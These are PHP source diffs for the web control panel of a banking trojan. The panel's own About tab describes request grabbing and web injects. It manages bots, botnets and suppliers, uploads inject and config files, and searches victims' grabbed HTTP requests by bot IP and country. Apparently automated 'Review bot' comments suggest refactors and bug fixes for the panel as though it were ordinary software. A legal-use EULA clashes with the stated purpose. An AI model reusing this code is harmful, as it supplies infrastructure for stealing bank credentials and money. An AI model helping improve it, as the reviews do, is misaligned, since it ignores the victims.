if (!BOT) exit();
if (IS_AJAX_REQUEST) include "botnets.act.php";
print "<!-- TABS begin -->
<table width=100% cellspacing=0 cellpadding=0>
<tr>
<td nowrap class=tab_psv id='tl_1'><a href='javascript:sel(1);'>BOTs</a></td>
<td nowrap class=tab_psv id='tl_2'><a href='javascript:sel(2);'>BotNETs</a></td>
<td nowrap class=tab_psv id='tl_3'><a href='javascript:sel(3);'>Suppliers</a></td>
<td class=no_tab>&nbsp;</td>
</tr>
</table>
<!-- TABS end -->
<!-- TAB 1 begin -->
<table cellspacing=0 id='el_1' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 1 tabcontent begin -->\n";
include "botnets.bots.php";
print " <!-- TAB 1 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 1 end -->
<!-- TAB 2 begin -->
<table cellspacing=0 id='el_2' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 2 tabcontent begin -->\n";
include "botnets.botnets.php";
print " <!-- TAB 2 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 2 end -->
<!-- TAB 3 begin -->
<table cellspacing=0 id='el_3' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 3 tabcontent begin -->\n";
include "botnets.suppliers.php";
print " <!-- TAB 3 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 3 end -->";
?>
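Review bot: The tab scaffold in this file (header row, one `el_N` table and one `include` per tab) is repeated almost verbatim in configs.php, events.php, filter.php, injects.php and logs.php, differing only in the captions and the included file names. A small helper taking an array of caption => include pairs would remove the duplication and would be the single place to keep in step with the `for (var i=1;i<5;i++)` loop in index.php's `sel()`, which silently caps a page at four tabs. Note also that `botnets.act.php` is included only for AJAX requests and ends with `exit()`, so the markup that follows is never printed on those requests; a comment stating that intent, e.g. `// AJAX: action handler answers and exits; the tab markup below is for full page loads only`, would help the reader.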


@@ -0,0 +1,57 @@
<?php
if (!BOT) exit();
print "<table id='suppliers' cellspacing=1 cellpadding=0 class='block'>
<tr class='bothdr'>
<td width=15%>Supplier</td>
<td width=10%>Bots</td>
<td width=75%>Comment</td>
</tr>\n\n";
reset($SUPPLIERS);
while ($val = current($SUPPLIERS)) {
$key = key($SUPPLIERS);
print "<tr class='botstr'>
<td align=left>[ <b>{$key}</b> ]</td>
<td>200000</td>
<td>{$val['comment']}</td>
</tr>\n";
next($SUPPLIERS);
}
print "</table>
<form id='newsupplier'>
<table cellspacing=1 cellpadding=0 class='block'>
<tr>
<td width=15%><input type='text' name='supplier' maxlength=12 id='supplier'></td>
<td width=75%><input type='text' name='comment' maxlength=128 id='comment'></td>
<td width=10%><input type='submit' value='Add new supplier' class='srchbtn'></td>
</tr>
</table>
</form>
<script>
$('#newsupplier').submit(function() {
var frm = $(this);
if ($(frm).find('#supplier').val() == '') { alert('Supplier name is not specified'); return false; }
$(frm).find(':submit').attr('disabled', true);
$.post('?botnets', $(frm).serialize(), function(data) {
if (data == 'success') $('#suppliers').append('<tr class=\'botstr\'><td align=left>[ <b>'+$(frm).find('#supplier').val()+'</b> ]</td><td>200000</td><td>'+$(frm).find('#comment').val()+'</td></tr>');
else alert(data);
$(frm).find(':submit').attr('disabled', false);
});
return false;
});
</script>\n\n\n";
?>


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
exit();
?>


@@ -0,0 +1,38 @@
<?php
if (!BOT) exit();
if ($_POST['delete']) {
unlink('../data/configs/config');
}
elseif (!empty($_FILES)) {
$DATA = file_get_contents($_FILES['cfgfile']['tmp_name']);
$DATA = str_replace("\r\n", "\n", $DATA);
$DATA = str_replace("\r", "\n", $DATA);
file_put_contents('../data/configs/config', "\n".$DATA."\n");
}
clearstatcache();
$STAT = @stat('../data/configs/config');
print "<form method=post enctype=multipart/form-data>
<table cellspacing=1 cellpadding=0 class=block>
<tr>
<td width=250px><b>CONFIGS<br><br>";
if ($STAT['mtime']) print " file size: {$STAT['size']} bytes<br>
uploaded: ".date("d/m/Y - H:i:s", $STAT['mtime'])."</b><br><br>
<input type=submit class=button name='delete' value='DELETE'>";
print "</td>
<td><input type=file style='width:200px;' name='cfgfile'> <input type=submit class=button value='GO'></td>
</tr>
</table>
</form>";
?>
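Review bot: The upload branch reads `$_FILES['cfgfile']['tmp_name']` without checking that the upload succeeded; when `error` is not `UPLOAD_ERR_OK` the `tmp_name` is empty, `file_get_contents` returns false, and the existing config is overwritten with just two newlines. The condition should be `elseif (isset($_FILES['cfgfile']) && $_FILES['cfgfile']['error'] === UPLOAD_ERR_OK && is_uploaded_file($_FILES['cfgfile']['tmp_name'])) {`. `$_POST['delete']` is read without `isset`, the `unlink` result is discarded, and `@stat` returns false for a missing file so `$STAT['mtime']` indexes a boolean. injects.injects.php is a copy of this file with the same issues.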


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "correlation";
?>


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "editor";
?>


@@ -0,0 +1,62 @@
<?php
if (!BOT) exit();
if (IS_AJAX_REQUEST) include "configs.act.php";
print "<!-- TABS begin -->
<table width=100% cellspacing=0 cellpadding=0>
<tr>
<td nowrap class=tab_psv id='tl_1'><a href='javascript:sel(1);'>Configs</a></td>
<td nowrap class=tab_psv id='tl_2'><a href='javascript:sel(2);'>Correlation</a></td>
<td nowrap class=tab_psv id='tl_3'><a href='javascript:sel(3);'>Editor</a></td>
<td class=no_tab>&nbsp;</td>
</tr>
</table>
<!-- TABS end -->
<!-- TAB 1 begin -->
<table cellspacing=0 id='el_1' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 1 tabcontent begin -->\n";
include "configs.configs.php";
print " <!-- TAB 1 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 1 end -->
<!-- TAB 2 begin -->
<table cellspacing=0 id='el_2' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 2 tabcontent begin -->\n";
include "configs.correlation.php";
print " <!-- TAB 2 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 2 end -->
<!-- TAB 3 begin -->
<table cellspacing=0 id='el_3' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 3 tabcontent begin -->\n";
include "configs.editor.php";
print " <!-- TAB 3 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 3 end -->";
?>


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
exit();
?>


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "events1";
?>


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "events2";
?>


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "events3";
?>


@@ -0,0 +1,62 @@
<?php
if (!BOT) exit();
if (IS_AJAX_REQUEST) include "events.act.php";
print "<!-- TABS begin -->
<table width=100% cellspacing=0 cellpadding=0>
<tr>
<td nowrap class=tab_psv id='tl_1'><a href='javascript:sel(1);'>events1</a></td>
<td nowrap class=tab_psv id='tl_2'><a href='javascript:sel(2);'>events2</a></td>
<td nowrap class=tab_psv id='tl_3'><a href='javascript:sel(3);'>events3</a></td>
<td class=no_tab>&nbsp;</td>
</tr>
</table>
<!-- TABS end -->
<!-- TAB 1 begin -->
<table cellspacing=0 id='el_1' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 1 tabcontent begin -->\n";
include "events.events1.php";
print " <!-- TAB 1 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 1 end -->
<!-- TAB 2 begin -->
<table cellspacing=0 id='el_2' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 2 tabcontent begin -->\n";
include "events.events2.php";
print " <!-- TAB 2 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 2 end -->
<!-- TAB 3 begin -->
<table cellspacing=0 id='el_3' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 3 tabcontent begin -->\n";
include "events.events3.php";
print " <!-- TAB 3 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 3 end -->";
?>


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
exit();
?>


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "filter1";
?>


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "filter2";
?>


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "filter3";
?>


@@ -0,0 +1,62 @@
<?php
if (!BOT) exit();
if (IS_AJAX_REQUEST) include "filter.act.php";
print "<!-- TABS begin -->
<table width=100% cellspacing=0 cellpadding=0>
<tr>
<td nowrap class=tab_psv id='tl_1'><a href='javascript:sel(1);'>filter1</a></td>
<td nowrap class=tab_psv id='tl_2'><a href='javascript:sel(2);'>filter2</a></td>
<td nowrap class=tab_psv id='tl_3'><a href='javascript:sel(3);'>filter3</a></td>
<td class=no_tab>&nbsp;</td>
</tr>
</table>
<!-- TABS end -->
<!-- TAB 1 begin -->
<table cellspacing=0 id='el_1' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 1 tabcontent begin -->\n";
include "filter.filter1.php";
print " <!-- TAB 1 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 1 end -->
<!-- TAB 2 begin -->
<table cellspacing=0 id='el_2' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 2 tabcontent begin -->\n";
include "filter.filter2.php";
print " <!-- TAB 2 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 2 end -->
<!-- TAB 3 begin -->
<table cellspacing=0 id='el_3' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 3 tabcontent begin -->\n";
include "filter.filter3.php";
print " <!-- TAB 3 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 3 end -->";
?>


@@ -0,0 +1,114 @@
<?php
if (!defined('BOT')) die;
print "<!-- TABS begin -->
<table width=100% cellspacing=0 cellpadding=0>
<tr>
<td nowrap class=tab_psv id='tl_1'><a href='javascript:sel(1);'>About</a></td>
<td nowrap class=tab_psv id='tl_2'><a href='javascript:sel(2);'>EULA</a></td>
<td nowrap class=tab_psv id='tl_3'><a href='javascript:sel(3);'>Manual</a></td>
<td nowrap class=tab_psv id='tl_4'><a href='javascript:sel(4);'>Support</a></td>
<td class=no_tab>&nbsp;</td>
</tr>
</table>
<!-- TABS end -->
<!-- TAB 1 begin -->
<table cellspacing=0 id='el_1' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 1 tabcontent begin -->
<table width=100% cellspacing=1 cellpadding=0 class=block>
<tr align=left>
<td style='padding-left:5px;'>
<br><b>{$MYNAME}. Auto transfer oriented banking trojan.</b><br><br>
<b>Features:</b><br><br>
Requests grabbing and web injects:<br>
- Internet Explorer http(s)<br>
- Mozilla Firefox http(s)<br>
- Google Chrome https<br><br>
</td>
</tr>
</table>
<!-- TAB 1 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 1 end -->
<!-- TAB 2 begin -->
<table cellspacing=0 id='el_2' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 2 tabcontent begin -->
<table width=100% cellspacing=1 cellpadding=0 class=block>
<tr align=left>
<td style='padding-left:5px;'>
<br><b>End User License Agreement</b><br><br>
This is the <b>{$MYNAME}</b> project.<br>
This tool is intended for legal security research, education and testing purposes only.<br>
It is not intended to be used for any unauthorized or illicit purposes.<br>
Any testing done with this tool must be limited to systems that you own or are explicitly authorized to test.<br>
Using this tool, you assume any and all responsibility for consequences which can arise up.<br>
Authors take no responsibility under any circumstances and damages that arises from your possession of this tool or using the code presented here.<br>
If you do not agree, you dont authorised to use this tool and must immediately delete it.<br><br>
</td>
</tr>
</table>
<!-- TAB 2 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 2 end -->
<!-- TAB 3 begin -->
<table cellspacing=0 id='el_3' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 3 tabcontent begin -->
<table width=100% cellspacing=1 cellpadding=0 class=block>
<tr align=left>
<td style='padding-left:5px;'><br><b>You can rob the corovans.</b><br><br></td>
</tr>
</table>
<!-- TAB 3 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 3 end -->
<!-- TAB 4 begin -->
<table cellspacing=0 id='el_4' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 4 tabcontent begin -->
<table width=100% cellspacing=1 cellpadding=0 class=block>
<tr align=left>
<td style='padding-left:5px;'><br><b>May the Force be with you... always...</b><br><br></td>
</tr>
</table>
<!-- TAB 4 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 4 end -->";
?>



@@ -0,0 +1,134 @@
<?php
// error_reporting(0);
define('BOT', true);
define('IS_AJAX_REQUEST', isset($_SERVER['HTTP_X_REQUESTED_WITH']) && strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) == 'xmlhttprequest');
file_put_contents("AJAX_REQUEST_LOG.txt", file_get_contents('php://input'));
include "../includes/mysql.php";
include "../includes/geoip.php";
include "../includes/continents.php";
include "../includes/datatypes.php";
include "../data/titles/suppliers.php";
include "../data/titles/botnets.php";
$GeoIP = new GeoIP;
$MYNAME = 'H&micro;NT&euro;R&dollar;';
function stripslashes_array($array) {
return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
}
if (get_magic_quotes_gpc()) {
$_GET = stripslashes_array($_GET);
$_POST = stripslashes_array($_POST);
}
$MENU_ELEMENTS = array(
"Status" => "status",
"BotNETs" => "botnets",
"Tasks" => "tasks",
":",
"Injects" => "injects",
"Configs" => "configs",
"Plugins" => "plugins",
":",
"LOGS" => "logs",
"Stats" => "stats",
"Tracking" => "tracking",
"Events" => "events",
"Filter" => "filter",
":",
"System" => "system",
"Settings" => "settings",
"Help" => "help");
$DISPLAY = "";
$PAGE_INCLUDE = "";
$PAGE_CAPTION = "404 Not Found";
while (current($MENU_ELEMENTS)) {
$uri = current($MENU_ELEMENTS);
$key = key($MENU_ELEMENTS);
next($MENU_ELEMENTS);
if ($uri==":") {
$DISPLAY .= "<b> | </b>";
continue;
}
if (isset($_GET[$uri]) or ($uri=="status" and !$_SERVER['QUERY_STRING'])) {
$PAGE_INCLUDE = $uri;
$PAGE_CAPTION = $key;
$uri .= "' style='background:#090909;color:#709070;";
}
$DISPLAY .= "<a href='?{$uri}'>{$key}</a>";
}
$DISPLAY .= "<b> | </b><a href='?logout'>LogOut</a>";
if (!IS_AJAX_REQUEST) {
print "<html>
<head>
<title>{$MYNAME} | {$PAGE_CAPTION}</title>
<link rel='shortcut icon' href='images/demonic_alien_microbe.ico'>
<link rel='stylesheet' type='text/css' href='styles/dark.css'>
<script type='text/javascript' src='scripts/jquery.js'></script>
</head>
<body>
<table class=wrap cellspacing=0 cellpadding=0>
<tr>
<td colspan=5 class=menu>
{$DISPLAY}
</td>
</tr>
<tr>
<td>
<!-- #################################################################################################### -->\n\n\n";
}
if ($PAGE_INCLUDE) include $PAGE_INCLUDE.".php";
else echo "<b>{$PAGE_CAPTION}</b>";
$coock = "BOT_".$PAGE_INCLUDE;
$tab = intval($_COOKIE["BOT_".$PAGE_INCLUDE]);
print "\n\n\n<!-- #################################################################################################### -->
</td>
</tr>
</table>
<script>
function act(tab) {
document.getElementById('tl_'+tab).className='tab_act';
document.cookie='{$coock}='+tab;
$('#el_'+tab).fadeIn();
}
function sel(tab){
if (document.getElementById('el_'+tab).style.display == 'none') {
for (var i=1;i<5;i++) {
if (i==tab) continue;
try{document.getElementById('el_'+i).style.display = 'none';
document.getElementById('tl_'+i).className='tab_psv';}catch(e){}
}
act(tab);
}
}
sel(".($tab ? $tab : 1).");
</script>
<b>&copy; 2010 - ".date('Y', time())." {$MYNAME} control panel v 100.500 | 5 sql queries executed in 0.5 seconds | script executed in 0.7 seconds | request executed in 1.2 seconds</b>
</body>
</html>";
?>
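Review bot: `file_put_contents("AJAX_REQUEST_LOG.txt", file_get_contents('php://input'));` runs on every request, not only AJAX ones, and without `FILE_APPEND` it replaces the file with the latest raw request body each time; next to the commented-out `// error_reporting(0);` it looks like a debugging leftover that should be removed or guarded by a debug constant. Because the file is written into the web root, the `Options -Indexes` rule in this commit only hides it from directory listings, so the last submitted form body is readable by a direct request, and on a deployed copy it is the most recent request preserved on disk. The `mysql_*` functions used by the includes were removed in PHP 7.0 and `get_magic_quotes_gpc()` in PHP 8.0, so the panel is tied to PHP 5; that constraint deserves a header comment. `$coock` and `$tab` rebuild the same key; `$tab = intval($_COOKIE[$coock]);` avoids the duplication.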


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
exit();
?>


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "correlation";
?>


@@ -0,0 +1,38 @@
<?php
if (!BOT) exit();
if ($_POST['delete']) {
unlink('../data/injects/injects');
}
elseif (!empty($_FILES)) {
$DATA = file_get_contents($_FILES['injfile']['tmp_name']);
$DATA = str_replace("\r\n", "\n", $DATA);
$DATA = str_replace("\r", "\n", $DATA);
file_put_contents('../data/injects/injects', "\n".$DATA."\n");
}
clearstatcache();
$STAT = @stat('../data/injects/injects');
print "<form method=post enctype=multipart/form-data>
<table cellspacing=1 cellpadding=0 class=block>
<tr>
<td width=250px><b>INJECTS<br><br>";
if ($STAT['mtime']) print " file size: {$STAT['size']} bytes<br>
uploaded: ".date("d/m/Y - H:i:s", $STAT['mtime'])."</b><br><br>
<input type=submit class=button name='delete' value='DELETE'>";
print "</td>
<td><input type=file style='width:200px;' name='injfile'> <input type=submit class=button value='GO'></td>
</tr>
</table>
</form>";
?>


@@ -0,0 +1,47 @@
<?php
if (!BOT) exit();
if (IS_AJAX_REQUEST) include "injects.act.php";
print "<!-- TABS begin -->
<table width=100% cellspacing=0 cellpadding=0>
<tr>
<td nowrap class=tab_psv id='tl_1'><a href='javascript:sel(1);'>Injects</a></td>
<td nowrap class=tab_psv id='tl_2'><a href='javascript:sel(2);'>Correlation</a></td>
<td class=no_tab>&nbsp;</td>
</tr>
</table>
<!-- TABS end -->
<!-- TAB 1 begin -->
<table cellspacing=0 id='el_1' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 1 tabcontent begin -->\n";
include "injects.injects.php";
print " <!-- TAB 1 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 1 end -->
<!-- TAB 2 begin -->
<table cellspacing=0 id='el_2' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 2 tabcontent begin -->\n";
include "injects.correlation.php";
print " <!-- TAB 2 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 2 end -->";
?>


@@ -0,0 +1,77 @@
<?php
if (!BOT) exit();
function GetHttpReqBrief ($data) {
if (substr($data, 0, 4)=='GET ' || substr($data, 0, 5)=='POST ') {
$headers = explode("\r\n", $data);
if (substr($data, 4, 8)=="https://" || substr($data, 5, 8)=="https://" || substr($data, 4, 7)=="http://" || substr($data, 5, 7)=="http://") {
$pieces = explode(" ", $headers[0]);
$BRIEF = "<b>{$pieces[0]}</b> ";
$pieces = explode("/", $pieces[1]);
$BRIEF .= "{$pieces[0]}//<font class=highlight>{$pieces[2]}</font>/";
array_splice($pieces, 0, 3);
$resource = implode("/", $pieces);
$BRIEF .= $resource;
}
else {
$host = "unidentified";
while ($header = next($headers)) {
if (substr($header, 0, 6)=="Host: ") {
$host = substr($header, 6);
break;
}
}
$pieces = explode(" ", $headers[0]);
$BRIEF = "<b>{$pieces[0]}</b> https://<font class=highlight>{$host}</font>".$pieces[1];
}
}
else $BRIEF = "<b>unidentified</b>";
return $BRIEF;
}
function HighLight2 ($data) {
$expl = explode("\r\n\r\n", $data);
$headers = $expl[0];
$contents = $expl[1];
$hdrs = explode("\r\n", $headers);
$unit = explode(" ", $hdrs[0]);
$unit[0] = "<font class=hdrslight>{$unit[0]}</font>";
$hdrs[0] = implode(" ", $unit);
for ($i=1; $i<count($hdrs);$i++) {
$unit = explode(":", $hdrs[$i]);
$unit[0] = "<font class=hdrslight>{$unit[0]}</font>";
$hdrs[$i] = implode(":", $unit);
}
$headers = implode("\r\n", $hdrs);
$headers = str_replace("MSIE", "<font class=highlight>MSIE</font>", $headers);
$headers = str_replace("Chrome", "<font class=highlight>Chrome</font>", $headers);
$headers = str_replace("Firefox", "<font class=highlight>Firefox</font>", $headers);
$vars = explode("&amp;", $contents);
if (count($vars)>1) {
$count = count($vars);
for ($i=0; $i<$count;$i++) {
if ($vars[$i]=='') {
unset($vars[$i]);
continue;
}
$unit = explode("=", $vars[$i]);
$unit[1] = urldecode($unit[1]);
$vars[$i] = "<font class=varslight onclick='alert(\"{$unit[1]}\")'>{$unit[0]}=</font>".$unit[1];
}
$contents = implode("\n", $vars);
}
$data = $headers."\r\n\r\n".$contents;
return $data;
}
?>
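Review bot: `HighLight2` assumes its input is well formed: `$expl[1]` is undefined when `$data` has no `\r\n\r\n` header/body separator, and `$unit[1]` is undefined for a form field without `=`; both need a guard such as `$contents = isset($expl[1]) ? $expl[1] : '';`. The `onclick='alert(\"{$unit[1]}\")'` attribute receives the value after `urldecode`, while the caller in logs.act.php escapes the whole record with `htmlspecialchars` and `addslashes` before calling this function, so decoding here can reintroduce the quote characters the caller escaped; escape after decoding instead of before. In `GetHttpReqBrief` the relative-URL branch hard-codes `https://` in front of the `Host` value although the request line does not carry the scheme, so the label should state that the scheme is assumed or omit it.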


@@ -0,0 +1,292 @@
<?php
if (!BOT) exit();
include "logs.act.fn.php";
// ##############
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD>
if (isset($_POST['botcomment'])) {
$_POST['botcomment'] = mysql_escape_string($_POST['botcomment']);
$query = "UPDATE `bots` SET `comment`='{$_POST['botcomment']}' WHERE `bot_uid`='{$_POST['bot_uid']}'";
mysql_query($query);
die ('*'.$_POST['botcomment']);
}
// ##############
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD>
if (isset($_POST['logcomment'])) {
$_POST['logcomment'] = mysql_escape_string($_POST['logcomment']);
foreach($LOGSTABLES as $var) {
$query = "UPDATE `{$var}` SET `comment`='{$_POST['logcomment']}' WHERE `log_id`=".intval($_POST['log_id']);
mysql_query($query);
}
die ('*'.$_POST['logcomment']);
}
// ##############
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
if (isset($_POST['dellogs'])) {
array_walk($_POST['logid'], 'intval');
foreach($LOGSTABLES as $var) {
$query = "DELETE FROM `{$var}` WHERE `log_id`=".implode(' OR `log_id`=', $_POST['logid']);
mysql_query($query);
}
die ('success');
}
// ##############
// <20><><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD>
if(isset($_POST['phrase'])){
// ###################
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
if (!empty($_POST['phrase'])) {
$fp = fopen('../data/temp/searchlog.txt', 'a');
fwrite($fp, date("d.m.Y H:i:s")."\t".$_SERVER['REMOTE_ADDR']."\t".$_POST['phrase']."\n");
fclose($fp);
}
// ##############
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
$CONDITIONS = '';
if (!empty($_POST['phrase'])) $CONDITIONS[] = "`data` LIKE '%".mysql_escape_string($_POST['phrase'])."%'";
if (!empty($_POST['']));
if ($CONDITIONS) $CONDITIONS = ' WHERE '.implode(' AND ', $CONDITIONS);
// ##################
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
$SELTABLES = array();
sort($LOGSTABLES);
reset($LOGSTABLES);
while ($val = current($LOGSTABLES)) {
next($LOGSTABLES);
if ($val==$_POST['from_date'] or $val==$_POST['to_date']) break;
}
$SELTABLES[] = $val;
if ($_POST['from_date']!=$_POST['to_date']) while ($val = current($LOGSTABLES)) {
next($LOGSTABLES);
$SELTABLES[] = $val;
if ($val==$_POST['from_date'] or $val==$_POST['to_date']) break;
}
// #####################
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD>
foreach($SELTABLES as $key => $var) $SELTABLES[$key] = "SELECT * FROM `{$var}`".$CONDITIONS;
$query = implode(' UNION ', $SELTABLES).' LIMIT '.intval($_POST['limit']);
$result = mysql_query($query) or die("Query failed : " . mysql_error());
// #################
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
print "<!-- Search result begin -->
<input type='submit' value='Expand all' class='button' onclick=\"$(this).parent().find('div').show();\"><input type='submit' value='Collapse all' class='button' onclick=\"$(this).parent().find('div').hide();\"><input type='submit' value='Toggle' class='button' onclick=\"$(this).parent().find('div').toggle();\"> |
<input type='submit' value='Select all' class='button' onclick=\"$(this).parent().find(':checkbox').attr('checked', true);\"><input type='submit' value='Unselect all' class='button'onclick=\"$(this).parent().find(':checkbox').removeAttr('checked');\"><input type='submit' value='Invert' class='button'onclick=\"$(this).parent().find(':checkbox').checkToggle();\"> |
<input type='submit' value='Remember selected' class='button' onclick='remclick(this);return false;'><input type='submit' value='Export selected' class='button' onclick='exportclick(this);return false;'><input type='submit' value='Delete selected' class='button' onclick='deleteclick(this);return false;'>
<form onSubmit='return false'>
<table cellpadding=0 cellspacing=0 class='block'>
<tr><td>\n";
$i = 0;
while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
$i++;
$datasize = strlen($row['data']);
$row['data'] = addslashes(htmlspecialchars($row['data']));
switch ($row['data_type']) {
case 0:
$BRIEF = "";
break;
case 1:
$BRIEF = "";
break;
case 2:
$BRIEF = GetHttpReqBrief($row['data']);
$row['data'] = HighLight2($row['data']);
break;
case 3:
$BRIEF = "<b>Grabbed by inject data</b>";
break;
}
$row['data'] = nl2br($row['data']);
// \"$(this).parent().parent().parent().next().slideToggle('fast');\"
// <td onclick=\"$(this).find('div').html('<input type=text>')\"><div style='width:300px;'>".htmlspecialchars($row['comment'])."</div></td>
// $(this).find('div').hide();$(this).find('select').fadeIn();
$bot = mysql_fetch_array(mysql_query("SELECT * FROM `bots` WHERE `bot_uid`='{$row['bot_uid']}';"), MYSQL_ASSOC);
print "<table cellpadding=2 cellspacing=1 width=100%>
<tr class=briefrow".($i % 2).">
<td width=13px height=21px><input type=checkbox name='logid[]' value='{$row['log_id']}'></td>
<td onclick=\"$(this).parent().parent().parent().next().slideToggle('fast');\"><div class='briefcell'>{$BRIEF}</div></td>
<td onclick=\"CommentLog(this, {$row['log_id']});\"><div style='width:300px;'>".htmlspecialchars($row['comment'])."</div></td>
<td onclick=\"CommentBot(this, '{$row['bot_uid']}');\"><div id='UID{$row['bot_uid']}' style='width:300px;'>".htmlspecialchars($bot['comment'])."</div></td>
</tr>
</table>
<div style='margin-top: -1; display: none;'>
<table cellpadding=2 cellspacing=1 width=100%>
<tr class=logrow".($i % 2).">
<td align=right valign=top width=70px class=briefrow".($i % 2)."><b>Log ID:<br>
Bot UID:<br>
Data type:<br>
Time:<br>
Bot IP<br>
Country:<br>
Botnet:<br>
Supplier:<br>(sub):</b></td>
<td valign=top class=briefrow".($i % 2)."><div style='width:100px;'># {$row['log_id']} <a href='{$row['log_id']}'>({$datasize})</a><br>
{$row['bot_uid']}<br>
{$DATA_TYPES[$row['data_type']]}<br>
".date("d/m/y H:i:s", $row['timestamp'])."<br>
{$row['bot_ip']}<br>
[{$row['bot_country']}] {$GeoIP->GEOIP_COUNTRY_NAMES[$GeoIP->GEOIP_COUNTRY_CODE_TO_NUMBER[$row['bot_country']]]}<br>
[ {$row['bot_net']} ]<br>
[ {$row['bot_supp']} ]<br>({$row['supp_sub']})</div></td>
<td valign=top><div style='width:1052px;white-space:normal;'>{$row['data']}</div></td>
</tr>
</table>
</div>\n\n";
}
print "</td></tr>
</table>
</form>
<!-- Search result end -->
</td>
</tr>\n";
mysql_free_result($result);
print "<script>
function CommentLog(zis, log_id) {
if (!$(zis).find('input').length) {
var data = $(zis).find('div').text();
$(zis).find('div').html('<input type=text name=logcomment>').find('input').focus().val(data).keyup(function(e) {
if(e.keyCode == 13) {
data = $(zis).find('input').serialize();
$(zis).find('div').html('<img src=\"images/saving.gif\">');
$.post('?logs', data+'&log_id='+log_id, function(data) { $(zis).find('div').text(data); });
}
});
}
}
function CommentBot(zis, bot_uid) {
if (!$(zis).find('input').length) {
var data = $(zis).find('div').text();
$(zis).find('div').html('<input type=text name=botcomment>').find('input').focus().val(data).keyup(function(e) {
if(e.keyCode == 13) {
data = $(zis).find('input').serialize();
$(zis).find('div').html('<img src=\"images/saving.gif\">');
$.post('?logs', data+'&bot_uid='+bot_uid, function(data) {
$('#[id=UID'+bot_uid+']').text(data);
// $('.UID'+bot_uid).text(data); // class
});
}
});
}
}
jQuery.fn.checkToggle = function() {
return this.each(function() {
this.checked = !this.checked;
});
};
function remclick(zis) {
alert('Not ready yet');
}
function exportclick(zis) {
alert('Not ready yet');
}
function deleteclick(zis) {
var frm = $(zis).parent().find('form');
var req = $(frm).serialize();
if (req == '') { alert('Select something first'); return false; }
if (confirm('Are you sure you want to delete selected logs ?')==false) return false;
$(zis).attr('disabled', true);
$.post('?logs', 'dellogs=&' + req, function(data) {
if (data == 'success') {
var els = $(frm).find('input:checked').parent().parent().parent();
$(els).parent().next().remove();
$(els).remove();
}
else alert(data);
$(zis).attr('disabled', false);
});
}
</script>";
}
exit();
?>


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "parser";
?>


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
